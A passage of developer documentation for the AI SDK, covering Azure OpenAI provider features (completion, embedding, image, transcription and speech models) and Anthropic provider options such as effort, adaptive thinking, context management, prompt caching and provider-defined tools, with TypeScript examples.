},
});
for (const part of result.content) {
if (part.type === 'source') {
if (part.sourceType === 'document') {
const providerMetadata = part.providerMetadata as
| AzureResponsesSourceDocumentProviderMetadata
| undefined;
if (!providerMetadata) continue;
const annotation = providerMetadata.azure;
switch (annotation.type) {
case 'file_citation':
// file_citation is returned from file_search and provides:
// properties: type, fileId and index
// The filename can be accessed via part.filename.
break;
case 'container_file_citation':
// container_file_citation is returned from code_interpreter and provides:
// properties: type, containerId and fileId
// The filename can be accessed via part.filename.
break;
case 'file_path':
// file_path provides:
// properties: type, fileId and index
break;
default: {
const _exhaustiveCheck: never = annotation;
throw new Error(
`Unhandled annotation: ${JSON.stringify(_exhaustiveCheck)}`,
);
}
}
}
}
}
Completion Models
You can create models that call the completions API using the .completion() factory method.
The first argument is the model id.
Currently only gpt-35-turbo-instruct is supported.
const model = azure.completion('your-gpt-35-turbo-instruct-deployment');
OpenAI completion models also support some model-specific settings that are not part of the standard call settings. You can pass them as an options argument:
import {
azure,
type OpenAILanguageModelCompletionOptions,
} from '@ai-sdk/azure';
import { generateText } from 'ai';
const result = await generateText({
model: azure.completion('your-gpt-35-turbo-instruct-deployment'),
prompt: 'Write a haiku about coding.',
providerOptions: {
openai: {
echo: true, // optional, echo the prompt in addition to the completion
logitBias: {
// optional likelihood for specific tokens
'50256': -100,
},
suffix: 'some text', // optional suffix that comes after a completion of inserted text
user: 'test-user', // optional unique user identifier
} satisfies OpenAILanguageModelCompletionOptions,
},
});
The following optional provider options are available for Azure OpenAI completion models:
- echo: boolean
  Echo back the prompt in addition to the completion.
- logitBias: Record<number, number>
  Modifies the likelihood of specified tokens appearing in the completion. Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token. As an example, you can pass {"50256": -100} to prevent the <|endoftext|> token from being generated.
- logprobs: boolean | number
  Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving. Setting to true will return the log probabilities of the tokens that were generated. Setting to a number will return the log probabilities of the top n tokens that were generated.
- suffix: string
  The suffix that comes after a completion of inserted text.
- user: string
  A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.
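For instance, requesting log probabilities for the top 3 tokens looks like this (a sketch, using the same completion deployment as above):
import {
  azure,
  type OpenAILanguageModelCompletionOptions,
} from '@ai-sdk/azure';
import { generateText } from 'ai';
const result = await generateText({
  model: azure.completion('your-gpt-35-turbo-instruct-deployment'),
  prompt: 'Write a haiku about coding.',
  providerOptions: {
    openai: {
      logprobs: 3, // return log probabilities for the top 3 tokens
    } satisfies OpenAILanguageModelCompletionOptions,
  },
});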
Embedding Models
You can create models that call the Azure OpenAI embeddings API
using the .embedding() factory method.
const model = azure.embedding('your-embedding-deployment');
Azure OpenAI embedding models support several additional settings. You can pass them as an options argument:
import { azure, type OpenAIEmbeddingModelOptions } from '@ai-sdk/azure';
import { embed } from 'ai';
const { embedding } = await embed({
model: azure.embedding('your-embedding-deployment'),
value: 'sunny day at the beach',
providerOptions: {
openai: {
dimensions: 512, // optional, number of dimensions for the embedding
user: 'test-user', // optional unique user identifier
} satisfies OpenAIEmbeddingModelOptions,
},
});
The following optional provider options are available for Azure OpenAI embedding models:
- dimensions: number
  The number of dimensions the resulting output embeddings should have. Only supported in text-embedding-3 and later models.
- user: string
  A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.
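To embed several values in one call, the same deployment can be used with the AI SDK's embedMany function (a minimal sketch):
import { azure } from '@ai-sdk/azure';
import { embedMany } from 'ai';
const { embeddings } = await embedMany({
  model: azure.embedding('your-embedding-deployment'),
  values: ['sunny day at the beach', 'rainy afternoon in the city'],
});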
Image Models
You can create models that call the Azure OpenAI image generation API (DALL-E) using the .image() factory method. The first argument is your deployment name for the DALL-E model.
const model = azure.image('your-dalle-deployment-name');
Azure OpenAI image models support several additional settings. You can pass them as providerOptions.openai when generating the image:
await generateImage({
model: azure.image('your-dalle-deployment-name'),
prompt: 'A photorealistic image of a cat astronaut floating in space',
size: '1024x1024', // '1024x1024', '1792x1024', or '1024x1792' for DALL-E 3
providerOptions: {
openai: {
user: 'test-user', // optional unique user identifier
responseFormat: 'url', // 'url' or 'b64_json', defaults to 'url'
},
},
});
Example
You can use Azure OpenAI image models to generate images with the generateImage function:
import { azure } from '@ai-sdk/azure';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: azure.image('your-dalle-deployment-name'),
prompt: 'A photorealistic image of a cat astronaut floating in space',
size: '1024x1024', // '1024x1024', '1792x1024', or '1024x1792' for DALL-E 3
});
// image contains the URL or base64 data of the generated image
console.log(image);
Model Capabilities
Azure OpenAI supports DALL-E 2 and DALL-E 3 models through deployments. The capabilities depend on which model version your deployment is using:
| Model Version | Sizes |
|---|---|
| DALL-E 3 | 1024x1024, 1792x1024, 1024x1792 |
| DALL-E 2 | 256x256, 512x512, 1024x1024 |
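Depending on the deployed model version, you may be able to request multiple images per call with the n parameter (a sketch; note that DALL-E 3 deployments typically allow only one image per request):
import { azure } from '@ai-sdk/azure';
import { generateImage } from 'ai';
const { images } = await generateImage({
  model: azure.image('your-dalle-deployment-name'),
  prompt: 'A photorealistic image of a cat astronaut floating in space',
  n: 2, // generate two candidate images (subject to model support)
  size: '1024x1024',
});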
Transcription Models
You can create models that call the Azure OpenAI transcription API using the .transcription() factory method.
The first argument is the model id e.g. whisper-1.
const model = azure.transcription('whisper-1');
Transcription models may require the deployment-based URL format, which you can enable when creating the provider:
import { createAzure } from '@ai-sdk/azure';
const azure = createAzure({
useDeploymentBasedUrls: true,
apiVersion: '2025-04-01-preview',
});
This uses the legacy endpoint format which may be required for certain Azure OpenAI deployments.
When using useDeploymentBasedUrls, the default api-version is not valid. You must set it to 2025-04-01-preview or an earlier value.
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the input language in ISO-639-1 (e.g. en) format will improve accuracy and latency.
import { experimental_transcribe as transcribe } from 'ai';
import { azure, type OpenAITranscriptionModelOptions } from '@ai-sdk/azure';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: azure.transcription('whisper-1'),
audio: await readFile('audio.mp3'),
providerOptions: {
openai: {
language: 'en',
} satisfies OpenAITranscriptionModelOptions,
},
});
The following provider options are available:
- timestampGranularities: string[]
  The granularity of the timestamps in the transcription. Defaults to ['segment']. Possible values are ['word'], ['segment'], and ['word', 'segment']. Note: There is no additional latency for segment timestamps, but generating word timestamps incurs additional latency.
- language: string
  The language of the input audio. Supplying the input language in ISO-639-1 format (e.g. 'en') will improve accuracy and latency. Optional.
- prompt: string
  An optional text to guide the model's style or continue a previous audio segment. The prompt should match the audio language. Optional.
- temperature: number
  The sampling temperature, between 0 and 1. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic. If set to 0, the model will use log probability to automatically increase the temperature until certain thresholds are hit. Defaults to 0. Optional.
- include: string[]
  Additional information to include in the transcription response.
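For example, requesting word-level timestamps (a sketch; note the extra latency mentioned above):
import { experimental_transcribe as transcribe } from 'ai';
import { azure, type OpenAITranscriptionModelOptions } from '@ai-sdk/azure';
import { readFile } from 'fs/promises';
const result = await transcribe({
  model: azure.transcription('whisper-1'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    openai: {
      timestampGranularities: ['word'], // word-level timestamps incur additional latency
    } satisfies OpenAITranscriptionModelOptions,
  },
});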
Model Capabilities
Supported transcription models include whisper-1, gpt-4o-mini-transcribe, and gpt-4o-transcribe; capability details (transcription, duration, segments, language) vary by model.
Speech Models
You can create models that call the Azure OpenAI speech API using the .speech() factory method.
The first argument is your deployment name for the text-to-speech model (e.g., tts-1).
const model = azure.speech('your-tts-deployment-name');
Example
import { azure } from '@ai-sdk/azure';
import { experimental_generateSpeech as generateSpeech } from 'ai';
const result = await generateSpeech({
model: azure.speech('your-tts-deployment-name'),
text: 'Hello, world!',
voice: 'alloy', // OpenAI voice ID
});
You can also pass additional provider-specific options using the providerOptions argument:
import { azure, type OpenAISpeechModelOptions } from '@ai-sdk/azure';
import { experimental_generateSpeech as generateSpeech } from 'ai';
const result = await generateSpeech({
model: azure.speech('your-tts-deployment-name'),
text: 'Hello, world!',
voice: 'alloy',
providerOptions: {
openai: {
speed: 1.2,
} satisfies OpenAISpeechModelOptions,
},
});
The following provider options are available:
- instructions: string
  Control the voice of your generated audio with additional instructions, e.g. "Speak in a slow and steady tone". Does not work with tts-1 or tts-1-hd. Optional.
- speed: number
  The speed of the generated audio. Select a value from 0.25 to 4.0. Defaults to 1.0. Optional.
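For example, steering the voice with instructions (a sketch; this requires a gpt-4o-mini-tts deployment, since instructions does not work with tts-1 or tts-1-hd, and the deployment name is hypothetical):
import { azure, type OpenAISpeechModelOptions } from '@ai-sdk/azure';
import { experimental_generateSpeech as generateSpeech } from 'ai';
const result = await generateSpeech({
  model: azure.speech('your-gpt-4o-mini-tts-deployment'), // hypothetical deployment name
  text: 'Hello, world!',
  voice: 'alloy',
  providerOptions: {
    openai: {
      instructions: 'Speak in a slow and steady tone.',
    } satisfies OpenAISpeechModelOptions,
  },
});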
Model Capabilities
Azure OpenAI supports TTS models through deployments. The capabilities depend on which model version your deployment is using:
| Model Version | Instructions |
|---|---|
| tts-1 | No |
| tts-1-hd | No |
| gpt-4o-mini-tts | Yes |
title: Anthropic
description: Learn how to use the Anthropic provider for the AI SDK.
Anthropic Provider
The Anthropic provider contains language model support for the Anthropic Messages API.
Setup
The Anthropic provider is available in the @ai-sdk/anthropic module. You can install it with
pnpm add @ai-sdk/anthropic
Provider Instance
You can import the default provider instance anthropic from @ai-sdk/anthropic:
import { anthropic } from '@ai-sdk/anthropic';
If you need a customized setup, you can import createAnthropic from @ai-sdk/anthropic and create a provider instance with your settings:
import { createAnthropic } from '@ai-sdk/anthropic';
const anthropic = createAnthropic({
// custom settings
});
You can use the following optional settings to customize the Anthropic provider instance:
- baseURL: string
  Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.anthropic.com/v1.
- apiKey: string
  API key that is being sent using the x-api-key header. It defaults to the ANTHROPIC_API_KEY environment variable. Only one of apiKey or authToken is required.
- authToken: string
  Auth token that is being sent using the Authorization: Bearer header. It defaults to the ANTHROPIC_AUTH_TOKEN environment variable. Only one of apiKey or authToken is required.
- headers: Record<string, string>
  Custom headers to include in the requests.
- fetch: (input: RequestInfo, init?: RequestInit) => Promise<Response>
  Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
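For example, a customized instance that routes through a proxy and adds a header (a sketch; the URL and header are hypothetical):
import { createAnthropic } from '@ai-sdk/anthropic';
const anthropic = createAnthropic({
  baseURL: 'https://my-proxy.internal/v1', // hypothetical proxy endpoint
  headers: { 'x-request-source': 'docs-example' }, // hypothetical custom header
});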
Language Models
You can create models that call the Anthropic Messages API using the provider instance.
The first argument is the model id, e.g. claude-3-haiku-20240307.
Some models have multi-modal capabilities.
const model = anthropic('claude-3-haiku-20240307');
You can also use the following aliases for model creation:
- anthropic.languageModel('claude-3-haiku-20240307') - Creates a language model
- anthropic.chat('claude-3-haiku-20240307') - Alias for languageModel
- anthropic.messages('claude-3-haiku-20240307') - Alias for languageModel
You can use Anthropic language models to generate text with the generateText function:
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: anthropic('claude-3-haiku-20240307'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Anthropic language models can also be used in the streamText function
and support structured data generation with Output
(see AI SDK Core).
The following optional provider options are available for Anthropic models:
- disableParallelToolUse: boolean
  Optional. Disables the use of parallel tool calls. Defaults to false. When set to true, the model will only call one tool at a time instead of potentially calling multiple tools in parallel.
- sendReasoning: boolean
  Optional. Include reasoning content in requests sent to the model. Defaults to true. If you are experiencing issues with the model handling requests involving reasoning content, you can set this to false to omit them from the request.
- effort: "low" | "medium" | "high" | "xhigh" | "max"
  Optional. See the Effort section for more details.
- taskBudget: object
  Optional. See the Task Budgets section for more details.
- speed: "fast" | "standard"
  Optional. See the Fast Mode section for more details.
- inferenceGeo: "us" | "global"
  Optional. See the Data Residency section for more details.
- thinking: object
  Optional. See the Reasoning section for more details.
- toolStreaming: boolean
  Whether to enable tool streaming (and structured output streaming). Defaults to true.
- structuredOutputMode: "outputFormat" | "jsonTool" | "auto"
  Optional. Determines how structured outputs are generated.
  - "outputFormat": Use the output_format parameter to specify the structured output format.
  - "jsonTool": Use a special "json" tool to specify the structured output format.
  - "auto": Use "outputFormat" when supported, otherwise fall back to "jsonTool" (default).
- metadata: object
  Optional. Metadata to include with the request. See the Anthropic API documentation for details.
  - userId: string. An external identifier for the end-user. Should be a UUID, hash, or other opaque identifier. Must not contain PII.
Structured Outputs and Tool Input Streaming
Tool call streaming is enabled by default. You can opt out by setting the
toolStreaming provider option to false.
import { anthropic } from '@ai-sdk/anthropic';
import { streamText, tool } from 'ai';
import { z } from 'zod';
const result = streamText({
model: anthropic('claude-sonnet-4-20250514'),
tools: {
writeFile: tool({
description: 'Write content to a file',
inputSchema: z.object({
path: z.string(),
content: z.string(),
}),
execute: async ({ path, content }) => {
// Implementation
return { success: true };
},
}),
},
prompt: 'Write a short story to story.txt',
});
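To opt out of tool input streaming, set the toolStreaming provider option to false (a minimal sketch):
import { anthropic } from '@ai-sdk/anthropic';
import { streamText } from 'ai';
const result = streamText({
  model: anthropic('claude-sonnet-4-20250514'),
  prompt: 'Write a short story to story.txt',
  providerOptions: {
    anthropic: {
      toolStreaming: false, // disable tool input streaming
    },
  },
});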
Effort
Anthropic introduced an effort option with claude-opus-4-5 that affects thinking, text responses, and function calls. Effort defaults to high and you can set it to medium or low to save tokens and to lower time-to-last-token latency (TTLT). claude-opus-4-7 additionally supports xhigh for maximum reasoning effort.
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text, usage } = await generateText({
model: anthropic('claude-opus-4-20250514'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
anthropic: {
effort: 'low',
} satisfies AnthropicLanguageModelOptions,
},
});
console.log(text); // resulting text
console.log(usage); // token usage
Fast Mode
Anthropic supports a speed option for claude-opus-4-6 that enables faster inference with approximately 2.5x faster output token speeds.
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: anthropic('claude-opus-4-6'),
prompt: 'Write a short poem about the sea.',
providerOptions: {
anthropic: {
speed: 'fast',
} satisfies AnthropicLanguageModelOptions,
},
});
The speed option accepts 'fast' or 'standard' (default behavior).
Task Budgets
claude-opus-4-7 supports a taskBudget option that informs the model of the total token budget available for an agentic turn. The model uses this information to prioritize work, plan ahead, and wind down gracefully as the budget is consumed.
Task budgets are advisory — they do not enforce a hard token limit. The model will attempt to stay within budget, but actual usage may vary.
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: anthropic('claude-opus-4-7'),
prompt: 'Research the pros and cons of Rust vs Go for building CLI tools.',
providerOptions: {
anthropic: {
taskBudget: {
type: 'tokens',
total: 400000,
},
} satisfies AnthropicLanguageModelOptions,
},
});
For long-running agents that compact and restart context, you can carry the remaining budget forward using the remaining field:
taskBudget: {
type: 'tokens',
total: 400000,
remaining: 215000, // budget left after prior compacted-away contexts
}
The taskBudget object accepts:
- type: "tokens" - Budget type. Currently only "tokens" is supported.
- total: number - Total task budget for the agentic turn. Minimum 20,000.
- remaining: number - Budget left after prior compacted-away contexts. Must be between 0 and total. Defaults to total if omitted.
Data Residency
Anthropic supports an inferenceGeo option that controls where model inference runs for a request.
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: anthropic('claude-opus-4-6'),
prompt: 'Summarize the key points of this document.',
providerOptions: {
anthropic: {
inferenceGeo: 'us',
} satisfies AnthropicLanguageModelOptions,
},
});
The inferenceGeo option accepts 'us' (US-only infrastructure) or 'global' (default, any available geography).
Reasoning
Anthropic models support extended thinking, where Claude shows its reasoning process before providing a final answer.
Adaptive Thinking
For newer models (claude-sonnet-4-6, claude-opus-4-6, and later), use adaptive thinking.
Claude automatically determines how much reasoning to use based on the complexity of the prompt.
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text, reasoningText, reasoning } = await generateText({
model: anthropic('claude-opus-4-6'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
anthropic: {
thinking: { type: 'adaptive' },
} satisfies AnthropicLanguageModelOptions,
},
});
console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response
You can combine adaptive thinking with the effort option to control how much reasoning Claude uses:
const { text } = await generateText({
model: anthropic('claude-opus-4-6'),
prompt: 'Invent a new holiday and describe its traditions.',
providerOptions: {
anthropic: {
thinking: { type: 'adaptive' },
effort: 'max', // 'low' | 'medium' | 'high' | 'max'
} satisfies AnthropicLanguageModelOptions,
},
});
Thinking Display (Opus 4.7+)
Starting with claude-opus-4-7, thinking content is omitted from the response by default — thinking blocks are present in the stream but their text is empty. To receive reasoning output, set display: 'summarized':
const { text, reasoningText } = await generateText({
model: anthropic('claude-opus-4-7'),
providerOptions: {
anthropic: {
thinking: { type: 'adaptive', display: 'summarized' },
} satisfies AnthropicLanguageModelOptions,
},
prompt: 'How many people will live in the world in 2040?',
});
console.log(reasoningText); // reasoning text (empty without display: 'summarized')
console.log(text);
Budget-Based Thinking
For earlier models (claude-opus-4-20250514, claude-sonnet-4-20250514, claude-sonnet-4-5-20250929),
use type: 'enabled' with an explicit token budget:
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text, reasoningText, reasoning } = await generateText({
model: anthropic('claude-sonnet-4-5-20250929'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 12000 },
} satisfies AnthropicLanguageModelOptions,
},
});
console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response
See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.
Context Management
Anthropic's Context Management feature allows you to automatically manage conversation context by clearing tool uses or thinking content when certain conditions are met. This helps optimize token usage and manage long conversations more efficiently.
You can configure context management using the contextManagement provider option:
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const result = await generateText({
model: anthropic('claude-sonnet-4-5-20250929'),
prompt: 'Continue our conversation...',
providerOptions: {
anthropic: {
contextManagement: {
edits: [
{
type: 'clear_tool_uses_20250919',
trigger: { type: 'input_tokens', value: 10000 },
keep: { type: 'tool_uses', value: 5 },
clearAtLeast: { type: 'input_tokens', value: 1000 },
clearToolInputs: true,
excludeTools: ['important_tool'],
},
],
},
} satisfies AnthropicLanguageModelOptions,
},
});
// Check what was cleared
console.log(result.providerMetadata?.anthropic?.contextManagement);
Context Editing
Context editing strategies selectively remove specific content types from earlier in the conversation to reduce token usage without losing the overall conversation flow.
Clear Tool Uses
The clear_tool_uses_20250919 edit type removes old tool call/result pairs from the conversation history:
- trigger - Condition that triggers the clearing (e.g., { type: 'input_tokens', value: 10000 } or { type: 'tool_uses', value: 10 })
- keep - How many recent tool uses to preserve (e.g., { type: 'tool_uses', value: 5 })
- clearAtLeast - Minimum amount to clear (e.g., { type: 'input_tokens', value: 1000 })
- clearToolInputs - Whether to clear tool input parameters (boolean)
- excludeTools - Array of tool names to never clear
Clear Thinking
The clear_thinking_20251015 edit type removes thinking/reasoning blocks from earlier turns, keeping only the most recent ones:
- keep - How many recent thinking turns to preserve (e.g., { type: 'thinking_turns', value: 2 }) or 'all' to keep everything
const result = await generateText({
model: anthropic('claude-opus-4-20250514'),
prompt: 'Continue reasoning...',
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 12000 },
contextManagement: {
edits: [
{
type: 'clear_thinking_20251015',
keep: { type: 'thinking_turns', value: 2 },
},
],
},
} satisfies AnthropicLanguageModelOptions,
},
});
Compaction
The compact_20260112 edit type automatically summarizes earlier conversation context when token limits are reached. This is useful for long-running conversations where you want to preserve the essence of earlier exchanges while staying within token limits.
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { streamText } from 'ai';
const result = streamText({
model: anthropic('claude-opus-4-6'),
messages: conversationHistory,
providerOptions: {
anthropic: {
contextManagement: {
edits: [
{
type: 'compact_20260112',
trigger: {
type: 'input_tokens',
value: 50000, // trigger compaction when input exceeds 50k tokens
},
instructions:
'Summarize the conversation concisely, preserving key decisions and context.',
pauseAfterCompaction: false,
},
],
},
} satisfies AnthropicLanguageModelOptions,
},
});
Configuration:
- trigger - Condition that triggers compaction (e.g., { type: 'input_tokens', value: 50000 })
- instructions - Custom instructions for how the model should summarize the conversation. Use this to guide the compaction summary towards specific aspects of the conversation you want to preserve.
- pauseAfterCompaction - When true, the model will pause after generating the compaction summary, allowing you to inspect or process it before continuing. Defaults to false.
When compaction occurs, the model generates a summary of the earlier context. This summary appears as a text block with special provider metadata.
Detecting Compaction in Streams
When using streamText, you can detect compaction summaries by checking the providerMetadata on text-start events:
for await (const part of result.fullStream) {
switch (part.type) {
case 'text-start': {
const isCompaction =
part.providerMetadata?.anthropic?.type === 'compaction';
if (isCompaction) {
console.log('[COMPACTION SUMMARY START]');
}
break;
}
case 'text-delta': {
process.stdout.write(part.text);
break;
}
}
}
Compaction in UI Applications
When using useChat or other UI hooks, compaction summaries appear as regular text parts with providerMetadata. You can style them differently in your UI:
{
message.parts.map((part, index) => {
if (part.type === 'text') {
const isCompaction =
(part.providerMetadata?.anthropic as { type?: string } | undefined)
?.type === 'compaction';
if (isCompaction) {
return (
<div
key={index}
className="bg-yellow-100 border-l-4 border-yellow-500 p-2"
>
<span className="font-bold">[Compaction Summary]</span>
<div>{part.text}</div>
</div>
);
}
return <div key={index}>{part.text}</div>;
}
});
}
Applied Edits Metadata
After generation, you can check which edits were applied in the provider metadata:
const metadata = result.providerMetadata?.anthropic?.contextManagement;
if (metadata?.appliedEdits) {
metadata.appliedEdits.forEach(edit => {
if (edit.type === 'clear_tool_uses_20250919') {
console.log(`Cleared ${edit.clearedToolUses} tool uses`);
console.log(`Freed ${edit.clearedInputTokens} tokens`);
} else if (edit.type === 'clear_thinking_20251015') {
console.log(`Cleared ${edit.clearedThinkingTurns} thinking turns`);
console.log(`Freed ${edit.clearedInputTokens} tokens`);
} else if (edit.type === 'compact_20260112') {
console.log('Compaction was applied');
}
});
}
For more details, see Anthropic's Context Management documentation.
Cache Control
In the messages and message parts, you can use the providerOptions property to set cache control breakpoints.
You need to set the anthropic property in the providerOptions object to { cacheControl: { type: 'ephemeral' } } to set a cache control breakpoint.
Cache read and cache write (creation) token counts are returned on the standard
usage object for both generateText and streamText. You can access them at
result.usage.inputTokenDetails.cacheReadTokens and
result.usage.inputTokenDetails.cacheWriteTokens.
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const errorMessage = '... long error message ...';
const result = await generateText({
model: anthropic('claude-sonnet-4-5'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'You are a JavaScript expert.' },
{
type: 'text',
text: `Error message: ${errorMessage}`,
providerOptions: {
anthropic: { cacheControl: { type: 'ephemeral' } },
},
},
{ type: 'text', text: 'Explain the error message.' },
],
},
],
});
console.log(result.text);
console.log('Cache read tokens:', result.usage.inputTokenDetails.cacheReadTokens);
console.log(
'Cache write tokens:',
result.usage.inputTokenDetails.cacheWriteTokens,
);
You can also use cache control on system messages by providing multiple system messages at the head of your messages array:
const result = await generateText({
model: anthropic('claude-sonnet-4-5'),
messages: [
{
role: 'system',
content: 'Cached system message part',
providerOptions: {
anthropic: { cacheControl: { type: 'ephemeral' } },
},
},
{
role: 'system',
content: 'Uncached system message part',
},
{
role: 'user',
content: 'User prompt',
},
],
});
Cache control for tools:
const result = await generateText({
model: anthropic('claude-haiku-4-5'),
tools: {
cityAttractions: tool({
inputSchema: z.object({ city: z.string() }),
providerOptions: {
anthropic: {
cacheControl: { type: 'ephemeral' },
},
},
}),
},
messages: [
{
role: 'user',
content: 'User prompt',
},
],
});
Longer cache TTL
Anthropic also supports a longer 1-hour cache duration.
Here's an example:
const result = await generateText({
model: anthropic('claude-haiku-4-5'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'Long cached message',
providerOptions: {
anthropic: {
cacheControl: { type: 'ephemeral', ttl: '1h' },
},
},
},
],
},
],
});
Limitations
The minimum cacheable prompt length is:
- 4096 tokens for Claude Opus 4.5
- 1024 tokens for Claude Opus 4.1, Claude Opus 4, Claude Sonnet 4.5, Claude Sonnet 4, Claude Sonnet 3.7, and Claude Opus 3
- 4096 tokens for Claude Haiku 4.5
- 2048 tokens for Claude Haiku 3.5 and Claude Haiku 3
Shorter prompts cannot be cached, even if marked with cacheControl. Any requests to cache fewer than this number of tokens will be processed without caching.
For more on prompt caching with Anthropic, see Anthropic's Cache Control documentation.
Bash Tool
The Bash Tool allows running bash commands. Here's how to create and use it:
const bashTool = anthropic.tools.bash_20250124({
execute: async ({ command, restart }) => {
// Implement your bash command execution logic here
// Return the result of the command execution
},
});
Parameters:
- command (string): The bash command to run. Required unless the tool is being restarted.
- restart (boolean, optional): Specifying true will restart this tool.
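The tool is then passed like any other tool (a sketch; the tool key bash is the name Anthropic defines for this tool):
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  prompt: 'List the files in the current directory.',
  tools: {
    bash: bashTool, // the tool created above
  },
});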
Memory Tool
The Memory Tool allows Claude to use a local memory, e.g. in the filesystem. Here's how to create it:
const memory = anthropic.tools.memory_20250818({
execute: async action => {
// Implement your memory command execution logic here
// Return the result of the command execution
},
});
Only certain Claude versions are supported.
Text Editor Tool
The Text Editor Tool provides functionality for viewing and editing text files.
const tools = {
str_replace_based_edit_tool: anthropic.tools.textEditor_20250728({
maxCharacters: 10000, // optional
async execute({ command, path, old_str, new_str, insert_text }) {
// ...
},
}),
} satisfies ToolSet;
- textEditor_20250728 - For Claude Sonnet 4, Opus 4, and Opus 4.1 (recommended)
- textEditor_20250124 - For Claude Sonnet 3.7
- textEditor_20241022 - For Claude Sonnet 3.5
Note: textEditor_20250429 is deprecated. Use textEditor_20250728 instead.
Parameters:
- command ('view' | 'create' | 'str_replace' | 'insert' | 'undo_edit'): The command to run. Note: undo_edit is only available in Claude 3.5 Sonnet and earlier models.
- path (string): Absolute path to file or directory, e.g. /repo/file.py or /repo.
- file_text (string, optional): Required for the create command, with the content of the file to be created.
- insert_line (number, optional): Required for the insert command. The line number after which to insert the new string.
- new_str (string, optional): New string for the str_replace command.
- insert_text (string, optional): Required for the insert command, containing the text to insert.
- old_str (string, optional): Required for the str_replace command, containing the string to replace.
- view_range (number[], optional): Optional for the view command to specify the line range to show.
Computer Tool
The Computer Tool enables control of keyboard and mouse actions on a computer:
const computerTool = anthropic.tools.computer_20251124({
displayWidthPx: 1920,
displayHeightPx: 1080,
displayNumber: 0, // Optional, for X11 environments
enableZoom: true, // Optional, enables the zoom action
execute: async ({ action, coordinate, text, region }) => {
// Implement your computer control logic here
// Return the result of the action
// Example code:
switch (action) {
case 'screenshot': {
// multipart result:
return {
type: 'image',
data: fs
.readFileSync('./data/screenshot-editor.png')
.toString('base64'),
};
}
case 'zoom': {
// region is [x1, y1, x2, y2] defining the area to zoom into
return {
type: 'image',
data: fs.readFileSync('./data/zoomed-region.png').toString('base64'),
};
}
default: {
console.log('Action:', action);
console.log('Coordinate:', coordinate);
console.log('Text:', text);
return `executed ${action}`;
}
}
},
// map to tool result content for LLM consumption:
toModelOutput({ output }) {
return typeof output === 'string'
? [{ type: 'text', text: output }]
: [{ type: 'image', data: output.data, mediaType: 'image/png' }];
},
});
Parameters:
- action ('key' | 'type' | 'mouse_move' | 'left_click' | 'left_click_drag' | 'right_click' | 'middle_click' | 'double_click' | 'screenshot' | 'cursor_position' | 'zoom'): The action to perform. The zoom action is only available with computer_20251124.
- coordinate (number[], optional): Required for mouse_move and left_click_drag actions. Specifies the (x, y) coordinates.
- text (string, optional): Required for type and key actions.
- region (number[], optional): Required for the zoom action. Specifies [x1, y1, x2, y2] coordinates for the area to inspect.
- displayWidthPx (number): The width of the display in pixels.
- displayHeightPx (number): The height of the display in pixels.
- displayNumber (number, optional): The display number for X11 environments.
- enableZoom (boolean, optional): Enable the zoom action. Only available with computer_20251124. Default: false.
Web Search Tool
Anthropic provides a provider-defined web search tool that gives Claude direct access to real-time web content, allowing it to answer questions with up-to-date information beyond its knowledge cutoff.
You can enable web search using the provider-defined web search tool:
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const webSearchTool = anthropic.tools.webSearch_20250305({
maxUses: 5,
});
const result = await generateText({
model: anthropic('claude-opus-4-20250514'),
prompt: 'What are the latest developments in AI?',
tools: {
web_search: webSearchTool,
},
});
Configuration Options
The web search tool supports several configuration options:
- maxUses: number
  Maximum number of web searches Claude can perform during the conversation.
- allowedDomains: string[]
  Optional list of domains that Claude is allowed to search. If provided, searches will be restricted to these domains.
- blockedDomains: string[]
  Optional list of domains that Claude should avoid when searching.
- userLocation: object
  Optional user location information to provide geographically relevant search results.
const webSearchTool = anthropic.tools.webSearch_20250305({
maxUses: 3,
allowedDomains: ['techcrunch.com', 'wired.com'],
blockedDomains: ['example-spam-site.com'],
